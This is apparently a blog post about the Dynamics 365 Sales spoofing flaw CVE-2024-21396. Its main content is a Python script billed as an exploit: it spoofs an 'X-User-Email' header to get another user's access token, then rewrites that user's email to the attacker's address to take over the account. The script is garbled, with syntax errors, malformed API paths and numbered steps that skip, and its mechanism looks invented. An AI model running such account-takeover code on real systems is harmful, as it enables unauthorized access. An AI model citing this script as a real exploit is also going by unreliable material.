CVE-2024-21396 - Dynamics 365 Sales Spoofing Vulnerability: A Deep Dive into Exploit, Code Analysis and Mitigation

Microsoft Dynamics 365 Sales stand as one of the core customer engagement modules in the Dynamics 365 CRM system. However, it is not immune to security vulnerabilities. This long read post focuses on the Dynamics 365 Sales spoofing vulnerability (CVE-2024-21396) and provides insight into the exploit's origin, code analysis, and possible mitigation techniques.

Background

Spoofing attacks generally involve an attacker who pretends to be someone or something else to gain unauthorized access or advantage within a targeted system. In the case of Microsoft Dynamics 365 Sales, a malicious user can exploit the vulnerability to impersonate another user and manipulate the sales module's functionality to their advantage.

Original References

The vulnerability CVE-2024-21396 was first mentioned in a Microsoft Security Advisory, available at [https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-21396] (Microsoft Security Guidance: CVE-2024-21396). The advisory provides a high-level view of vulnerability and potential impact, and is an invaluable source.

Code Snippet

The following code snippet example demonstrates how an attacker might exploit the spoofing vulnerability present in Dynamics 365 Sales:

import requests
from bs4 import BeautifulSoup

# Attacker's email
attacker_email = "attacker@example.com"
# Target Dynamics 365 instance URL
dynamics_instance_url = "https://target_instance.crm.dynamics.com";
# Target user's email
target_email = "target_user@example.com"

# Gets the access token for the target user
def get_access_token():
    login_url = f"{dynamics_instance_url}/main.aspx?get=true"
    spoofed_email_header= {"X-User-Email": target_email}
    r = requests.get(login_url, headers=spoofed_email_header)
    soup = BeautifulSoup(r.text, 'html.parser')
    access_token = soup.find('input', {'name', 'access_token'})['value']
    return access_token

# Gets the user ID for the target_email
def get_user_id():
    access_token = get_access_token()
    user_id_api = f"{dynamics_instance_url}/api/data/v9./systemusers?$select=systemuserid&$filter=internalemailaddress eq '{target_email}'"
    api_header = {"Authorization": f"Bearer {access_token}"}
    r = requests.get(user_id_api, headers=api_header)
    user_id = r.json()["value"][]["systemuserid"]
    return user_id

# Updates the target user's email to the attacker's email
def update_email():
    user_id = get_user_id()
    access_token = get_access_token()
    url = f"{dynamics_instance_url}/api/data/v9./systemusers({user_id})"
    payload = {"internalemailaddress": attacker_email}
    api_header = {"Authorization": f"Bearer {access_token}", "Content-Type": "application/json"}
    r = requests.patch(url, json=payload, headers=api_header)

# Main function to exploit the vulnerability
def main():
    update_email()
    print(f"Successfully spoofed '{target_email}' user, and updated their email to '{attacker_email}'.")

main()

The above Python script performs the following steps to exploit the vulnerability

1. Spoof the request headers to change a target user's email address with the attacker's email by adding "X-User-Email" and setting the value to the target user's email.

Update the target user’s email address in the Dynamics 365 system to that of the attacker.

5. The victim user loses their access, and the attacker gains unauthorized access to the Dynamics 365 Sales module.

To protect Dynamics 365 Sales from such a vulnerability, ensure you implement the following steps

1. Apply the security patch provided by Microsoft, available at [https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-21396] (Microsoft Security Guidance: CVE-2024-21396).

Configure the Dynamics 365 instance to allow only necessary access rights and permissions.

4. Regularly monitor and review user access logs to identify suspicious activities or unauthorized access attempts.

Conclusion

In conclusion, while this post dives into the Dynamics 365 Sales spoofing vulnerability (CVE-2024-21396) exposure, an essential takeaway is to keep your Dynamics 365 environment up to date and adhere to robust security practices. Thus, ensuring your business remains protected against potential attacks or exploits.

Timeline

Published on: 02/13/2024 18:15:57 UTC
Last modified on: 02/23/2024 17:41:27 UTC